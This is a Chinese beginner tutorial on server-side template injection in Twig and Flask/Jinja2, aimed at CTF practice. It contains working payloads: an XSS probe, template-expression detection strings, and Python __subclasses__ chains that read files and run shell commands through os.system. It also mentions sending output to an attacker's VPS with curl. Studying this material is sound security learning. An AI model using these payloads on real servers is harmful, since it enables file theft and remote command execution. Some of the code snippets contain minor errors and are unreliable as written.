SSTI基础
SSTI:Server Side Template Injection,服务端模板注入。
因为作者也是首次学习此知识点,所有讲解可能会有些啰嗦,教程大概没有了解过模板的开发方式和模板注入的同学也可以听懂。
主要内容:
模板是什么
模板注入原理
Flask的介绍和利用
更新了一些题目,可供练手用。
原理
模板是什么
模板可以理解为一段固定好格式,等着你来填充信息的文件。通过这种方法,可以做到逻辑与视图分离,更容易、清楚且相对安全地编写前后端不同的逻辑。作为对比,一个很不好的解决方法是用脚本语言的字符串拼接html,然后统一输出。
这是一个模板的例子:
<!--login.tpl-->
<html>
<head>
<title>{{title}}</title>
</head>
<body>
<form method="{{method}}",action={{action}}>
<input type="text" name="user" value="{{username}}">
</form>
<p>
This page took {{microtime(true) - time}} seconds to render.
</p>
</body>
</html>
对应的后端代码逻辑可以是:
$templateEngine = new TemplateEngine();
$tpl = $templateEngine->loadFile(login.tpl);
$tpl->assign('title','Login');
$tpl->assign('method','post');
$tpl->assign('action','login.php');
$tpl->assign('username',getUserNameFromCookie());
$tpl->assign('time',microtime(true));
$tmp->show();
模板注入基本原理
如果用户输入作为【模板当中变量 的值】,模板引擎一般会对用户输入进行编码转义,不容易造成XSS攻击。
<?php
require_once(dirname(__FILE__).'/../lib/Twig/Autoloader.php');
Twig_Autoloader::register(true);
$twig = new Twig_Environment(new Twig_Loader_String());
$output = $twig->render("Hello {{name}}", array("name" =>$_GET["name"])); // 将用户输入作为模版变量的值
echo $output;
?>
这段代码输入<script>alert(1)</script>
会原样输出,因为进行了HTML实体编码。
但是如果用户输入作为了【模板内容 的一部分】,用户输入会原样输出。
<?php
require_once(dirname(__FILE__).'/../lib/Twig/Autoloader.php');
Twig_Autoloader::register(true);
$twig = new Twig_Environment(new Twig_Loader_String());
$output = $twig->render("Hello {$_GET['name']}"); // 将用户输入作为模版内容的一部分
echo $output;
?>
这段代码输入<script>alert(1)</script>
会造成XSS漏洞。
如果输入Vuln{%23 comment %23}{{2*8}}
,会执行2*8这个语句,输出Hello Vuln16
。因为经过渲染后,模板变成了Hello Vuln{# comment #}{{2\*8}}
。
不同的模板会有不同的语法,一般使用Detect-Identify-Expoit的利用流程。
识别不同模板
模板基础与利用方法
A.Python-Flask
它使用Jinja2作为渲染引擎
a.路由
通过@的注解方式,将资源和函数对应起来。
from flask import flask
@app.route('/index/')
def hello_word():
return 'hello word'
app.route装饰器作用是把函数和URL绑定。
也就是说,访问http://host:port/index
的时候,flask会返回HelloWorld
。
b.渲染
渲染的方法有render_template
和render_template_string
两种。
render_template()是用来渲染一个指定的文件的
return render_template('index.html')
render_template_string则是用来渲染一个字符串的
html = '<h1>This is index page</h1>'
return render_template_string(html)
c.模板使用
文件结构:在网站根目录下新建templates
文件夹,存放html的模板文件。
Flask使用Jinja2这个渲染引擎,它是以{{}}
作为变量包裹的标识符。同时,这个符号包裹内还可以执行一些简单的表达式。
模板的使用:示例
<!--/templates/index.html-->
<h1>{{content}}</h1>
#test.py
from flask import *
@app.route('/index/')
def user_login():
return render_template('index.html',content='This is index page.')
模板的不安全使用:示例
@app.route('/test/')
def test():
code = request.args.get('id')
html = '''
<h3>%s</h3>
'''%(code)
return render_template_string(html)
这里直接将用户输入作为了模板,不会经过转义和过滤的步骤,很容易XSS。
模板的安全使用:示例
@app.route('/test/')
def test():
code = request.args.get('id')
return render_template_string('<h1>{{ code }}</h1>',code=code)
模板引擎会对输入变量进行编码转义。
d.利用方法
首先,Flask中有一些全局变量,例如:
{{config}}
{{requests.environ}}
主要是通过Python对象的继承,用魔术方法一步步找到可利用的方法去执行。即找到父类<type 'object'>
–>寻找子类–>找关于命令执行或者文件操作的模块。
对象的魔术方法:
__class__ 返回类型所属的对象
__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__base__ 返回该对象所继承的基类
// __base__和__mro__都是用来寻找基类的
__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__ 类的初始化方法
__globals__ 对包含函数全局变量的字典的引用
下面简单解释一下利用过程
文件读取
#获取''字符串的所属对象
>>> ''.__class__
<class 'str'>
#获取str类的父类
>>> ''.__class__.__mro__
(<class 'str'>, <class 'object'>)
#获取object类的所有子类
>>> ''.__class__.__mro__[1].__subclasses__()
[<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, <class 'weakproxy'>, <class 'int'>, <class 'bytearray'>, <class 'bytes'>, <class 'list'>, <class 'NoneType'>, <class 'NotImplementedType'>, <class 'traceback'>, <class 'super'>...
#有很多类,后面省略
现在只需要从这些类中寻找需要的类,用数组下标获取,然后执行该类中想要执行的函数即可。比如第41个类是file类,就可以构造利用:
''.__class__.__mro__[2].__subclasses__()[40]('<File_To_Read>').read()
再比如,如果没有file类,使用类<class '_frozen_importlib_external.FileLoader'>
,可以进行文件的读取。这里是第91个类。
''.__class__.__mro__[2].__subclasses__()[91].get_data(0,"<file_To_Read>")
命令执行
首先通过脚本找到包含os模块的类。
num = 0
for item in ''.__class__.__mro__[1].__subclasses__():
try:
if 'os' in item.__init__.__globals__:
print (num,item)
num+=1
except:
print ('-')
num+=1
假设输出为x编号的类,则可以构造
''.__class__.__mro__[1].__subclasses__()[x].__init__.__globals__['os'].system('ls')
命令执行的结果如果不能直接看到,可以考虑通过curl工具发送到自己的VPS,或者使用CEYE平台。
执行脚本发现,包含os模块的类:
<class 'site._Printer'>
<class 'site.Quitter'>
其他函数的利用同理。
e.练习题目
攻防世界:Web_python_template_injection ,Flask模板注入板子题,上述知识即可解决。